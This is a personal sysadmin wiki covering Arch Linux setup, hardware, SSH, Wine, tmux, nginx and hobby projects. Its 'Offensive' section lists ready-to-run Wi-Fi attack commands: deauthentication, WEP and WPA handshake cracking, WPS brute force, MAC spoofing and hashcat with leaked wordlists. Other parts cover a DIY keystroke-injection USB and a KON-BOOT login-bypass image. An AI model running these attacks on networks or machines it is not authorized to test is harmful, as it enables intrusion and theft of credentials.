Wiki

My wiki

Start

About

This wiki is supposed to document my knowledge and setup so I don't have to look things up twice. Since you stumbled upon it, I hope it helps you!

Keep in mind that the wiki is permanently under construction. Information might be wrong, incomplete, ... I'm not exactly getting paid to keep it up to date.

Backup of the wiki's contents is here.

List of all pages

Contact me

If you wish to contact me, you can do so at following places:

You will get the fastest response via Telegram and email.

SSH pubkeys:

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKhUhbEr20+N3qDkkPkVDlBB+Ke+eomGfXIhtRd5MLGT root@ansible
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIufCM34eXtzcLG4cR/UrHFcAQf+x9/xOCwG+SVPD0LH c0rn3j@Luxuria
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILPSK/vU1jMRA3TCttiqNA1OSv4BOPOU6rLwoX5fM2rL u0_a240@Redmi9T

Donate

If I saved you some time, you can send a pizza my way by PayPal or pledge on the ghost town that is my Patreon account.

My

My

CV

Martin Rys

I am a Linux systems administrator born and currently living in Czechia.

My hobbies are reverse engineering, embedded electronics, creating and self-hosting varying services.

My hobby projects are mostly available on Gitlab.

Work experience:

Education:

Technical background:

Other:

My

Software

This page is a list of software I use.

I denote the license in brackets, I try to stick with software that is free and open-source, if a piece of software is not FOSS, source, I mark it red, as I do not want to recommend such, but it is what I am stuck with.

PC

Windows only

Linux only

Android

Browser addons

My

Contact

If you wish to contact me, you can do so at following places:

You will get the fastest response via Telegram and email.

SSH pubkeys:

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKhUhbEr20+N3qDkkPkVDlBB+Ke+eomGfXIhtRd5MLGT root@ansible
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIufCM34eXtzcLG4cR/UrHFcAQf+x9/xOCwG+SVPD0LH c0rn3j@Luxuria
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILPSK/vU1jMRA3TCttiqNA1OSv4BOPOU6rLwoX5fM2rL u0_a240@Redmi9T
My

Hardware

List of all the hardware I'm using and what I'm using it for.

Also has stuff of others that I want to keep track of.

Czechia

Mine

Networking

Peripherals and Other

PC

PC

Laptop

Laptop

Phones

Spares

Puzzles

Others

My

Services

Public

Private

Commercial

My

RSS

This is a list of my feeds on https://rss.rys.pw that serves as a backup

My

Monitoring

Monitoring commands for monitoring.rys.pw

'/usr/lib/monitoring-plugins/check_http' '--hostname=a4.rys.pw' '--ssl=1.2+' '--string=Enter output'
'/usr/lib/monitoring-plugins/check_http' '--hostname=analytics.rys.pw' '--ssl=1.2+' '--string=Sign in - Matomo'
'/usr/lib/monitoring-plugins/check_http' '--hostname=auth.rys.pw' '--ssl=1.2+' '--string=Keycloak' '--url=/auth/'
'/usr/lib/monitoring-plugins/check_http' '--hostname=www.bloody.com' '--string=V2020.0930' '--timeout=30' '--url=/en/download.php?id=6'
'/usr/lib/monitoring-plugins/check_http' '--expect=403' '--hostname=books.rys.pw' '--ssl=1.2+' '--string=Keycloak'
'/usr/lib/monitoring-plugins/check_http' '--hostname=cloud.rys.pw' '--ssl=1.2+' '--string=a safe home for all your data' '--url=/login'
'/usr/lib/monitoring-plugins/check_http' '--hostname=haste.rys.pw' '--ssl=1.2+' '--string=Duplicate & Edit'
'/usr/lib/monitoring-plugins/check_http' '--hostname=ip.rys.pw' '--ssl=1.2+' '--string=Your IPv4'
'/usr/lib/monitoring-plugins/check_http' '--hostname=lyrics.rys.pw' '--ssl=1.2+' '--string=her hips' '--url=/?title=six%20shooter'
'/usr/lib/monitoring-plugins/check_http' '--hostname=mail.rys.pw' '--ssl=1.2+' '--string=Roundcube Webmail' '--url=/webmail/'
'/usr/lib/monitoring-plugins/check_tcp' '--hostname' 'mumble.rys.pw' '--port' '64738'
'/usr/lib/monitoring-plugins/check_http' '--hostname=paste.rys.pw' '--ssl=1.2+' '--string=zero knowledge'
'/usr/lib/monitoring-plugins/check_http' '--hostname=ping.rys.pw' '--ssl=1.2+' '--string=Network Latency'
'/usr/lib/monitoring-plugins/check_http' '--hostname=radio.rys.pw' '--ssl=1.2+' '--string=Matomo'
'/usr/lib/monitoring-plugins/check_http' '--hostname=rss.rys.pw' '--ssl=1.2+' '--string=Main stream · FreshRSS' '--url=/i/'
'/usr/lib/monitoring-plugins/check_http' '--hostname=rys.pw' '--ssl=1.2+' '--string=Hardware'
'/usr/lib/monitoring-plugins/check_http' '--hostname=speedtest.rys.pw' '--ssl=1.2+' '--string=LibreSpeed'
'/usr/lib/monitoring-plugins/check_tcp' '--hostname' 'syncplay.rys.pw' '--port' '8999'
'/usr/lib/monitoring-plugins/check_http' '--hostname=text.rys.pw' '--ssl=1.2+' '--string=AGPL'
'/usr/lib/monitoring-plugins/check_http' '--hostname=wekan.rys.pw' '--ssl=1.2+' '--string=meteor_js'

Arch Linux

I use Arch Linux (or the spinoff ARM version) on practically all my machines.

Download

You can download Arch here

Basic commands and usage

Before going through the install guide you really should know these.

Lower/upper case is important in linux.

You can use arrow keys to navigate through your previous commands.

CTRL+ALT+F1-F12 - key combination for switching between terminals

cd DIRECTORY - for example cd /home/baf/Downloads - chooses directory

nano FILE - edit a text file

CTRL + C - break from a command, for example a ping

lsblk - lists all your drives and their partitions.

irssi - IRC in the CLI in case you get lost, #archlinux on Libera should help you out if you ask nicely.

Installing GPU proprietary drivers

Nvidia

sudo nano /etc/pacman.conf - uncomment [multilib] and the line below it. This is required for 32bit applications.

sudo pacman -Syu - synchronize the repository databases and update the system's packages

sudo pacman -S nvidia nvidia-libgl lib32-nvidia-libgl nvidia-settings

reboot

AMD

Do not use Catalyst. If you think you have to, rather get another GPU.

Table of hardware with needed drivers is here.

Installing packages from AUR

You can download user created PKGBUILDs from the AUR.

Package managers

Pacman

Usage: tldr pacman + the rest of this page:

-S has a useful --ignore packagename flag, which lets you ignore a broken package when doing a full update for example. Use multiple times when you want to avoid installing more packages. There's also a --noconfirm flag, which ignores confirmation of actions.

pacman -Qm - List packages installed locally.(that includes AUR)

You can get to the package cache via this command cd /var/cache/pacman/pkg/ and then use pacman -U packagename to downgrade/reinstall a package.

Converting Wii's Bluetooth module to a USB dongle

Original thread on Dolphin forums

Video

This page assumes no previous soldering knowledge whatsoever.

If you want perfect connection of real Wii motes to the Dolphin emulator, you want to pass-through one of the original chips to Dolphin.

There are two chips, the older 4250A-WML-C43 and the newer J27H002. The only difference between those seems to be that the newer version has slightly smaller test pads, but they're pretty small on both versions, so it's not going to make your job too much easier by choosing one over the other.

j27h002-4250a-wml-c43-bluetooth-module-board-for-nintendo-wii-replacement-part.jpg_640x640.png

Both chips go for about $1.3 a pop on Aliexpress.

List of things you'll need for this -

When you're done and you get the USB dongle to show up when connected, follow the Bluetooth Passthrough wiki page.

I will not be wiring the sync button as you can just use the software button in Dolphin when connecting the Wii motes, so essentially just ignore the button on the following schematic. If you want it there you're free to wire it up of course.

dolphin_bt_chip_schema.jpg

wii_bt_full_schematic.jpg

usb-a_and_b_schematic.jpg

  1. Solder the 4 wires to the USB-A connector and pull the cables through the plastic cover. Red for +, black for -, green for Data+ and white for Data-
  2. Continuity test - make sure none of the 4 pins is connected to its nearby pin(s) and that all pins are connected to the wires
  3. Pull the plastic cover onto the USB connector hard so it stays in place
  4. Put a shrink tube on USB(-) and pull another black wire through it, solder both to regulator GND. You should twist the wire ends together when soldering two at the same time
  5. Take two red wires and solder them to regulator output, put a shrink tube on them
  6. Put a shrink tube on USB(+) red wire and solder the wire to regulator input
  7. Continuity test the 2 pairs of wires on the regulator
  8. Pull the shrink tubes up and heat them under fire
  9. If you're using liquid flux like I am, pour it on the pads , let it be the for a short while then dry it up (or don't dry it if your flux doesn't turn into charcoal when heated up like mine does)
  10. If you don't have properly colored wires for Data+ and -, tontinuity test which wire is which and solder them onto the BT chip
  11. The 2 output red wires are because there's 3 output pads total (orange) - you need to connect all 3 together. One wire goes to the singular left pad, and other wire goes between the 2 right pads and you bridge those together
  12. Solder the remaining GND and you're done soldering
  13. Clean your iron on the damp sponge, put some solder on the tip and turn it off. this prevents degrading the tip.
  14. Test the dongle you made in a computer
  15. Finally hot glue the connections on the BT chip so they don't come off in case they get tugged on hard
  16. Put the connector on the USB dongle and hot glue it, hot glue the regulator from the other side
  17. With a working adapter, follow Dolphin's BT passthrough page

Creating a bootable flashdrive

To create a bootable flashdrive for Windows you'll need an 8GB+ flash drive. For Linux, it depends on the distribution. You should be fine with 1GB for Arch, but hey, 16GB flash drives are like $5 today.

Keep in mind that the flash drive can either be (U)EFI bootable, BIOS bootable(often named legacy in UEFI options) or both.

To actually boot from the flash drive, go into your UEFI/BIOS settings and either find the option to boot directly from the flash drive, or rearrange your boot order to boot from flash drive first.

On Windows

Linux or Windows images

Rufus - Rufus usually has no problem working with Linux and Windows ISOs and is easy to work with. The only negative thing is that I didn't figure out how to make ISOs that boot both under BIOS and UEFI, only one or the other, which is selected under the "Partition scheme" label.

You want to use "GPT for UEFI" partition scheme unless your hardware is years and years old.

unetbootin - Sometimes certain Linux distributions fail to be used by Rufus

On Linux and macOS

macOS has some command name differences not mentioned here, but the general idea works still.

Linux images

Unebootin or dd can be used for this purpose, I chose to use dd because it's preinstalled and straightforward.

Make sure to run lsblk to know what device you should be dealing with.

umount /dev/sde1 - Unmount the device in case it's mounted

sudo dd if=/path/to/file.iso of=/dev/sde bs=4M status=progress && sync

You should now be able to boot the distribution in both BIOS and UEFI, if the distribution supports it.


Windows images

Below is a description of the manual process, however you can use WoeUSB for an automated one.


[1] [2]

This handy script does the below-described process:

Format the flash drive with Gparted - Device > Create partition table - Set partition table to msdos. Afterwards create a FAT32 partition, remember to label it, labeling it is optional if you only want to keep only one OS on the flash drive but probably required for more.

Right click the partition you created > Manage flags > tick the 'boot' flag. Exit gparted.

Mount the ISO you want to use to some already existing folder

sudo mount -o loop ~/Downloads/Win8.1_English_x64.iso /mnt/iso

and copy all files from it to the mounted flash drive. The exclude is there to support Win10 1809+ images which have over 4GB install.wim which needs to be split:

rsync -rv --progress --exclude=install.wim /mnt/iso/ /run/media/c0rn3j/WINDOWS/

wimsplit /mnt/iso/sources/install.wim /run/media/c0rn3j/WINDOWS/sources/install.swm 3000

At this point the flash drive should be UEFI bootable. You're likely done here, but if you have a very old machine, the rest is needed to also enable BIOS booting.

Also you should create a file ei.cfg in the sources folder with following content(it makes sure you can actually select the edition):

[Channel]
Retail

sudo grub-install --target=i386-pc --boot-directory=/run/media/c0rn3j/WINDOWS/boot /dev/sdd - This command will install GRUB bootloader on the flash drive.

Last thing you'll need to do is create a config file for GRUB.

gedit /run/media/c0rn3j/WINDOWS/boot/grub/grub.cfg - This command will run gedit, paste the following text block in it and save it. Remove the label part if you didn't set one.

default=1
timeout=15
color_normal=light-cyan/dark-gray
menu_color_normal=black/light-cyan
menu_color_highlight=white/black
menuentry "Start Windows Installation" {
    insmod ntfs
    insmod search_label
    search --no-floppy --set=root --label WINDOWS --hint hd0,msdos1
    ntldr /bootmgr
    boot
}

The flash drive should now be bootable by both UEFI and BIOS.

KON-BOOT images

Format the flash drive with Gparted - Device > Create partition table - Set partition table to msdos. Afterwards create a FAT32 partition, remember to label it.

Copy the EFI folder onto the new partition.(you may need to rename it to lowercase efi?) Copy the files in USBFILES folder onto the new partition.

sudo grub-install --target=i386-pc --boot-directory=/run/media/c0rn3j/KONBOOT/boot /dev/sdd - This command will install GRUB bootloader on the flash drive.

sudo cp /usr/lib/syslinux/bios/memdisk /run/media/c0rn3j/KONBOOT/boot/grub/ - copies memdisk onto the flashdrive - needed for BIOS booting.

gedit /run/media/c0rn3j/KONBOOT/boot/grub/grub.cfg - create the following grub entry

 menuentry "Konboot" {
 linux16 /boot/grub/memdisk
 initrd16 /konboot.img
 }

Note: Konboot v2.5 does not seem to work on anything past the first W10 RTM build.

Using Android to emulate mass storage

You can boot images straight off your phone if you've root permissions.

Usb Mountr was one of the FOSS solutions, but it was dropped by the maintainer.

DriveDroid is supported but proprietary.

Your kernel might support emulating USB, emulating CD drive or both.

Dolphin

Info

Dolphin is an emulator, community/dolphin-emu on Arch.

If you have real Wii motes: Dolphin uses its own drivers so do not install xwiimote or anything similar, do not use bluetooth GUI or anything, simply connect a bluetooth dongle and start the BT service via

sudo systemctl start bluetooth

if it isn't on already. Go to Controllers in dolphin-emu, set at least one Real Wiimote and check continuous scanning. On pressing 1+2 or the red sync button the controller should connect and vibrate.

All chinese BT dongles will likely not work properly, throwing various errors at you when you try to use them with Dolphin.

Note: The wii motes can glitch out - you will need to take out the batteries for a second to get them to connect again.

You need to add ISO directory with your game ISO files to do so go to Config > Paths > Add... and select the directory.

You may want to go to Graphics > Enhancements and set the resolution to auto and use some AA and/or Anisotropics Filtering.

You should also go to controllers and check that the GC/Wii controllers are configured(You can always reset them to default).

Dolphin-emu has an awesome feature called Netplay, allowing you to play the games with your friends over the internet even though the games were meant to be played locally only! For that you'll need to have the exact same Dolphin-emu version, exact same ISO file(check file hash to know you do) and same Memory card save if you intend to use that.

Sadly Netplay doesn't work with real Wiimotes(yet...).

BT dongles

From my experience: some just don't work, some work weirdly, I'll try to list what I bought and where and how it works. None store-bought work truly well.

Dongle #1 - Works weirdly but after messing around with it for a bit I got both my wii motes to connect. Would not recommend.

Dongle #2 - Does not work with Dolphin.

Dongle #3 - works perfectly but I don't have an exact link, looks exactly like Dongle #2 but without any text on it or "golden" connector. Seems like it's USB 2.0 V2.0 BT dongle.

The only really functional option is to make your own from a Wii BT chip

Games

CS:GO

CSGO_Game_Mode_Commands

Figuring out wallbangs n stuff:

mp_buy_anywhere 1;mp_buytime 60000 
mp_maxmoney 65535;mp_startmoney 65535;mp_afterroundmoney 65535
mp_roundtime_defuse 60;mp_roundtime_hostage 60;mp_roundtime 60;mp_restartgame 1 

Danger zone bunny hop practice:

game_mode 0; game_type 2; map dz_sirocco
sv_cheats 1; sv_infinite_ammo 1; sv_regeneration_force_on 1
mp_autokick 0; mp_disable_autokick; bot_kick all
# MP (use changelevel instead of map above)
mp_respawn_on_death_ct 1; mp_respawn_on_death_t 1

exojump; give weapon_bumpmine; give weapon_knife

Crosshair(bad):

CSGO-F3pjS-84KDh-s7t54-W8m37-VVFyB

Interesting resources

Punycode attack on browser URLs - https://www.аррӏе.com/

From 0x90 to 0x4c454554, a journey into exploitation

Email spoofing

Teaching

Stolen from a Reddit comment somewhere:

  1. Test - before starting any topic, make sure your student has a grasp of the prerequisites by giving them simple tasks. Just because you have taught them the prerequisites a week ago does not mean that they didn't forget.

  2. When you are teaching them, talk as little as possible. The only thing you should be saying is the concepts.

  3. Ask lots of questions. I.e.: What is an object (expect them to repeat what you told them); What happens if (insert 10x different cases). Teach by asking.
    I can't emphasize this enough. When I teach, I never say more than 2 sentences without asking a question. Because you quickly realize that people have a hard time retaining more than 2-3 sentences at a time.

  4. Set 0 expectations. If you get frustrated it's because you have expectations. Many people have self confidence issues. Being disappointed will cause your students emotional stress and they will not be able to learn. They might start to avoid asking you questions...

  5. Listen. Many times, your students could be saying what you wanted to hear, but worded differently. Their analogy could have the same concept as yours but very different. Learn to recognize what students are saying.

Minecraft

From time to time I host a server for myself and a few friends, but new people are welcome too!

It's down most of the time.

Info

Installation

Notes

Clear all items on the ground - /kill @e[type=Item]

Where to get Forge

Main place to get mods rarely, some mods won't use Curseforge but a build server or a webpage (IC2 for example)

-Xms is startup memory and -Xmx is maximum allowed memory. -Xms8G -Xmx8G - makes minecraft start with 8GB and will let allocate memory up to 8GB as needed... This is useful as reallocation is costly so let's just go with max.

# Will install/update server + forge in the current directory.
java -jar forge-*-installer.jar --installServer

Modlist

Server setup

Offensive

Rubber Ducky

Screw the $45~ thing, we're making our own for $1.15~.

https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910

https://github.com/PlatyPew/Digispark-Duckduino

https://github.com/mame82/duck2spark

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Open Arduino IDE; File -> Preferences -> Additional Boards Manager URLs http://digistump.com/package_digistump_index.json

Tools -> Board -> Boards Manager -> Digistump AVR Boards - install it.

# cat > /etc/udev/rules.d/49-micronucleus.rules << EOF
SUBSYSTEMS=="usb", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666"
KERNEL=="ttyACM*", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666", ENV{ID_MM_DEVICE_IGNORE}="1"
EOF

reboot

You can now flash stuff to the board by selecting it as 'Digispark Default 16.5mhz'.

Do not plug the board before compiling process, do it after when you'll be prompted.

## This seems not needed anymore as the AVR package ships up to date micronucleus, and the project stopped providing precompiled linux library?
#git clone https://github.com/micronucleus/micronucleus.git
#cp ~/micronucleus/commandline/micronucleus /home/c0rn3j/.arduino15/packages/digistump/tools/micronucleus

General

http://tools.kali.org/tools-listing

Hashcat

Hashcat is a tool to crack various hashes, passwords and other formats. Hashcat is now merged into one OpenCL version(used to have a CUDA version for nvidia GPUs- CudaHashcat, the new hashcat only supports OpenCL).

For WPA2 it uses a new(2017) format called hccapx.

Attacking 802.11

[1] [2] [3]

http://tools.kali.org/wireless-attacks/mdk3

Preparation:

Packages: aircrack-ng wireshark-qt macchanger reaver-wps-fork-t6x


Kill your network manager service to avoid it interfering.

I am using NetworkManager.

sudo systemctl stop NetworkManager - sometimes it starts again so just try this twice...

Then use sudo airmon-ng to find out your interface name for the wireless card you want to use. If it is not listed, you are either lacking drivers or it is not compatible.

After finding out your interface name, turn your WLAN card into monitor mode with sudo airmon-ng start yourInterface, you will then have a _yourInterface_mon interface you can use. You can use the –verbose flag with the command to diagnose possible issues if it is not working as intended. You can use stop instead of start to make the interface go back to managed mode and use wi-fi as usual.

Since the default interface tends to be wlp8s0, that is what I am going to use for this page.


Change your MAC:

macchanger -r wlp8s0 - randomize MAC address completely. Alternatively use -m option and supply an address starting with 68:5D:43 or any other vendor specific address, as some routers and networks will not allow MAC that is not assigned to any vendor. (MAC is in this format XX:XX:XX:YY:YY:YY where XXXXXX is vendor specific and YYYYYY is random)

Wifite

There is a script called wifite that can do most of these attacks even if the attacker doesn't understand them. It fails in some more complicated cases.

git clone https://github.com/derv82/wifite

cd wifite/

sudo python2.7 ./wifite.py

Scan your surroundings

sudo airodump-ng wlp8s0mon

MAC address filtering

Use airodump to look for an active client and change your MAC address to theirs.

Hidden SSID

aireplay-ng -0 0 -a 00:1F:1F:1F:1F:1F -c 00:1F:1F:1F:1F:1F --ignore-negative-one wlp8s0mon

while running airodump. Successfully deauthing a client will make them broadcast the SSID in the clear because they'll have to reconnect.

WEP

airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -w wep -c CHANNEL --bssid BSSID wlp8s0mon

aireplay-ng -1 0 -a BSSID wlp8s0mon

aireplay-ng -3 -b BSSID wlp8s0mon

aircrack-ng filename.cap

WPA/WPA2-PSK

airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -c CHANNEL -w filename --bssid BSSID wlp8s0mon

aireplay-ng -0 0 -a BSSID wlp8s0mon

After obtaining 4-way handshake:

aircrack-ng –w WORDLIST -b BSSID filename.cap

WPA2-MGT MSCHAPv2

http://pastebin.com/CnJstqpH

WPS

Scan for WPS enabled APs

sudo wash -i wlp8s0mon

For Bruteforcing and logging for possible pixie attack. Use -K 1 parameter to try pixiewps while reaver is running. The plain bruteforce attack might take minutes to days, but usually it's max 10 hours.

sudo reaver -i wlp8s0mon -b BSSID -c channel -f -S -vvv -H

After obtaining at least one response you can use pixiewps to try the offline pixie attack. Whole pixiewps command will be saved in a text file if you supplied the -H command. Pixie attack takes anywhere from a second to 30 minutes, and only works if the router is vulnerable to it.

Cracking a handshake/capture file

Using GPU

Converting .cap to .hccapx

Use cap2hccapx (from the hashcat-utils package)

cap2hccapx capture.cap capture.hccapx

HCCAP to password

hashcat -m 2500 -w 1 filename.hccapx wordlist.txt

Using CPU

IVS file crack aircrack-ng -a2 -b F8:8E:88:AA:FF:BB -w wordlist-final.txt ivsfile.ivs

Other stuff

Find out default gateway route -n

Obtaining wordlists

hashes.org have awesome leaked lists, so I'm going with a bunch these. You can find different lists on torrent trackers.

7z x xxx_found.7z -owordlists - extract file into a folder called 'wordlists'

cat xxx_found_sorted.txt xxx_found_sorted.txt xxx_found_sorted.txt > mywordlist.txt - join all lists into one

sed -r '/^.{,7}$/d' mywordlist.txt > WPAwordlist.txt - remove everything that is 7 characters or less from the file and write that to a new file. WPA/2 does not accept less than 8 characters.

sort -T ~ -u WPAwordlist.txt > WPAwordlist_sorted.txt - change temporary directory to the home directory(sort would fail on a big file if /tmp is too small) and sort into a new file

SSH

Packages: openssh

Client config: /etc/ssh/ssh_config

Server config: /etc/ssh/sshd_config

What is SSH?

Notable config options:

Port # default port(22) is sometimes blocked on networks X11Forwarding # Lets you connect to the X server(forward GUI apps) Banner # Display a message before logging in(warning messages are required in some countries), file /etc/issue.net is usually used for that. Alternatively you can show a message after login, simply edit /etc/motd for that. PasswordAuthentication no # Force use of SSH keys ChallengeResponseAuthentication no # Force use of SSH keys(default set to no?)

sudo systemctl enable --now sshd - Enable sshd service and start it, this is required if you want to host a SSH server so it starts at boot.

By default SSH server accepts user logins(root is disabled by default), but you might want to generate and use SSH keys instead.

Default crypto used is 2048 bit RSA. This is a sane default, you could possibly use 4096 bit RSA(or higher), which has diminishing returns. It takes about 8x more resources to decrypt 4096 RSA than 2048 RSA.

Consider using the newer Ed25519 cipher. Ed25519 is supposedly the best current option. There is no need to set the key size, as all Ed25519 keys are 256 bits. The only problem should be compatibility with old openssh versions.

ssh-keygen -t ed25519 - Generate a keypair - you'll be prompted for a filepath and a password] to secure the key. The passphrase uses AES-128 for encryption. You probably don't want to use a passphrase though, so just leave it empty.

ssh-copy-id -i ~/SSHkey.pub -p 1234 hostname.org - Copy the public key to the server via SSH. In the example there is specified file path, port and hostname/IP.

By default the public keys allowed to connect to your machine are saved per line in ~/.ssh/authorized_keys

Cool thing that SSH can do is port forwarding:

Let's say I'm running a webserver on 192.168.122.254 - this command would forward the port 80 to port 20123, only for 127.0.0.1, so you could look at the website via http://localhost:20123 from the host machine you executed the ssh command on! You can of course replace the host(127.0.0.1) with whatever and forward your traffic through just for that website.

ssh -L :20123:127.0.0.1:80 username@192.168.122.254

This is remote mapping instead - executing this would forward the host's port 22 to the remote server's port 20123 - useful if ISP is blocking ports and you want to forward something through another server!

ssh -R :20123:127.0.0.1:22 username@rys.pw

System Administration

Software

Some tips

GRUB

GRUB on Arch wiki

Get grub to ignore bad devices and install properly:

blockdev --flushbufs /dev/sde && blockdev --flushbufs /dev/sda && grub-mkdevicemap -n

SSH

[[SSH]]

Wine

Dependencies: wine wine_gecko wine-mono winetricks

Wine is used to run Windows only executables on other operating systems. More information about Wine

You can have multiple Windows "installations" which are called prefixes. In fact it is suggested that you use a new prefix for each application you use.

~/.wine is the default wineprefix (a.k.a. "configuration directory" or "bottle"). You can change which prefix Wine uses by changing the WINEPREFIX environment variable (outside Wine). To do this, run the following in a terminal:

export WINEPREFIX=~/.wine-new wine winecfg

Alternatively, you can specify the wine prefix in each command, e.g.

WINEPREFIX=path_to_wineprefix wine winecfg

you can create a new 32 bit wineprefix using the WINEARCH environment variable(note: you can also export WINEARCH). In a terminal, type:

WINEARCH=win32 WINEPREFIX=~/.wine32bit winecfg

Do not use an existing directory for the new wineprefix: Wine must create it.

Once a 32 bit wineprefix is created, you no longer have to specify WINEARCH in the command line to use it, as the architecture of an existing wineprefix cannot be changed.

You can use wine64 instead of wine to force 64bit.

There are three Direct3D backends for Wine. Which one you use depends on what features your card supports.

wined3d - The D3D backend included with Wine upstream. It is a translation layer that converts Direct3D calls to OpenGL and then sends them to your OpenGL GPU driver. Usable on all GPUs, but has the worst performance.

wined3d with CSMT - A multi threaded, more optimized version of wined3d. It has the same support as wined3d but is much faster. It still incurs a high CPU overhead but if your CPU is good it can help give you better FPS.

Gallium Nine - A native D3D9 implementation that skips the OpenGL translation entirely, requires less CPU overhead, but requires you use a GPU driver which has the GPU side support built in, which are all the Gallium mesa drivers (radeonsi, r600g, nouveau). Nouveau is the open source nVidia driver, but it lacks performance due to reclocking issues and it does not support the GTX10 series because they haven't released signed binaries to support it.

winecfg - > Drives > Autodetect - binds your home folder

Make AppDB reports, it helps the community!

How to install SVP on Arch Linux to play interpolated movies

Dependencies: qt5-3d, mpv-git(AUR), svp(AUR)

Pre-requisites(optional): proprietary GPU drivers already installed.

Download and install mpv-git from AUR

Set up mpv socket - cat > ~/.config/mpv/mpv.conf << EOF input-ipc-server=/tmp/mpvsocket # Receives input from SVP hr-seek-framedrop=no # Fixes audio desync resume-playback=no # Not compatible with SVP EOF

Note: There's currently a small bug in SVP causing video stuttering - go to SVP control panel > Utilities > Application settings; and play with the number of "threads" which are set to 0 by default. Setting it to 15 fixed the stuttering issues for me.

That's it, running movies through mpv while having SVP manager turned on will play them smoothly!


Additionally you can install SMplayer, because MPV alone has almost no GUI and relies heavily on CLI commands.

Dependencies: smplayer

Launch SMplayer > open Preferences > Advanced > Options for MPlayer/mpv and add this to Options --input-ipc-server=/tmp/mpvsocket

rsync

Packages: rsync

Needs to be installed on both computers.

Using rsync over SSH and custom port:

rsync -avz -e "ssh -p PORT" path/to/folder/or/file domain.com:/copy/to/folder

-z flag for compression, -r flag for recursive, but that is already implied with -a, which preserves file permissions and such. (-a equals -rlptgoD (no -H,-A,-X))

Use destructive syncing – “rsync --del” – This will delete any items on the destination that are not present on the source.

Virtualization

Hypervisors

Xen

QEMU

KVM

Hyper-V

Virtualization under QEMU/KVM

virt-manager - start the interface. Make sure to do so after you're already connected to the internet, else it might use the wrong interface and you'll have no internet connectivity on the VMs.

virt-manager --no-fork - virtmanager will let you type passwords in the terminal instead of openssh-askpass or something like that

Create a new Virtual Machine using an .ISO image and default settings.

Now you should have a working BIOS VM. To create a UEFI one make sure to check customize install and select UEFI for firmware when creating a new VM.

Bi-directional copy pasting and drag-n-dropping files to a Windows KVM is possible by simply installing spice-guest-tools on the KVM(default virt-manager setup uses Spice for display, so it works out of the box)

To enlarge .qcow2 image, use command qemu-img resize ubuntu-server.qcow2 +5G Remember it'll end up as unallocated space


Using LXC/LXD containers

https://wiki.archlinux.org/index.php/LXD

Virtualization under VirtualBox

Packages: virtualbox linux-headers virtualbox-host-dkms

GPU Passthrough

https://www.youtube.com/watch?v=37D2bRsthfI

http://blog.wikichoon.com/2014/07/enabling-hyper-v-enlightenments-with-kvm.html

More stuff

Webserver in current folder

You can instantly create a webserver hosting contents of the folder you're currently in via python:

python -m http.server 8080

Tmux

Tmux is a terminal multiplexer, meaning you can SSH somewhere, run tmux there and disconnect without killing whatever you were running, or just have multiple terminal tabs without actually launching more terminals.

Full cheatsheet: http://hyperpolyglot.org/multiplexers

Tip: tmux running a session but list-sessions doesn't show it? This might help killall -s SIGUSR1 tmux

If you're running nested tmux sessions, explanation and tips how to do it efficiently. (CTRL+B twice to get into the second level session, thrice to get into third level etc)

Command to detach all other sessions(in case the window is small and other session is blocking resizing): attach -d

Basic usage:

tmux - start new tmux session

tmux ls - list active sessions

tmux a -t sessionName - attach to specific session

tmux kill-session -t sessionName - kill specific session

Inside of tmux:

CTRL+B d - detach session

CTRL+B % - split current pane vertically

CTRL+B " - split current pane horizontally

CTRL+B ARROW_KEY - move between panes

CTRL+B+ARROW_KEY - resize current pane

CTRL+B z - toggle current pane fullscreen state

CTRL+B x - kill current pane

CTRL+B c - create a new window

CTRL+B n - next window

CTRL+B p - previous window

Apache

Packages: apache php php-apache(why?) nghttp2

Sources:Arch wiki

Configuration files are located in the folder /etc/httpd/conf , the main configuration file is httpd.conf

sudo systemctl enable --now httpd - Enable and start the httpd service, you should now be able to access the Apache server via localhost:80

PHP7 >

in **httpd.conf**

comment **#LoadModule mpm_event_module modules/mod_mpm_event.so**

uncomment **LoadModule mpm_prefork_module modules/mod_mpm_prefork.so**

place **LoadModule php7_module modules/libphp7.so** at the end of the LoadModule list

and **Include conf/extra/php7_module.conf** at the end of the Include list

sudo systemctl restart httpd

Notes:

DocumentRoot in the config sets the folder for the website, default is /srv/http/

nginx + PHP

Packages: php nginx-mainline php-fpm openssl

systemctl enable --now php-fpm

sudo nano /etc/nginx/nginx.conf - Example config of the server blocks

 server {
        listen       0.0.0.0:80; # listen on IPv4
        listen       [::]:80 # listen on IPv6
        server_name  *.rys.pw rys.pw; #Redirect all port 80 requests to HTTPS(443)
        return 301 https://$host$request_uri;
 }
 server {
         listen       0.0.0.0:443 ssl http2; #listen for TLS IPv4 connections and enable HTTP2
         listen       [::]:443 ssl http2; #listen for TLS IPv6 connections and enable HTTP2
         server_name  rys.pw;
         root /usr/share/webapps/mediawiki;
         index index.php;
         location ~ \.php$ { # serve .php files via php-fpm
                 fastcgi_pass   unix:/run/php-fpm/php-fpm.sock;
                 fastcgi_index  index.php;
                 include        fastcgi.conf;
                 }
         location / {
                 index  index.html index.htm index.php;
                 }

 }
 server { #forward traffic going to proxy.rys.pw to another server - useful if you need more servers running.
          listen       0.0.0.0:443 ssl http2; #listen for TLS IPv4 connections and enable HTTP2
          listen       [::]:443 ssl http2; #listen for TLS IPv6 connections and enable HTTP2
          server_name  proxy.rys.pw;
          location / {
                 proxy_pass         http://10.0.0.10:443/;
                 proxy_redirect     default;
                 proxy_set_header   X-Real-IP  $remote_addr;
                 proxy_set_header   Host       $host;
                 proxy_set_header   X-Forwarded-Proto https;
                 proxy_set_header   X-Forwarded-Ssl on;
         }
 }

You can check if your config is valid via nginx -t, and then reload the server config via nginx -s reload, instead of restarting the daemon.

systemctl enable --now nginx - enable and start nginx

TLS(used to be SSL)

https://cipherli.st/

https://raymii.org/s/tutorials/Strong_SSL_Security_On_nginx.html

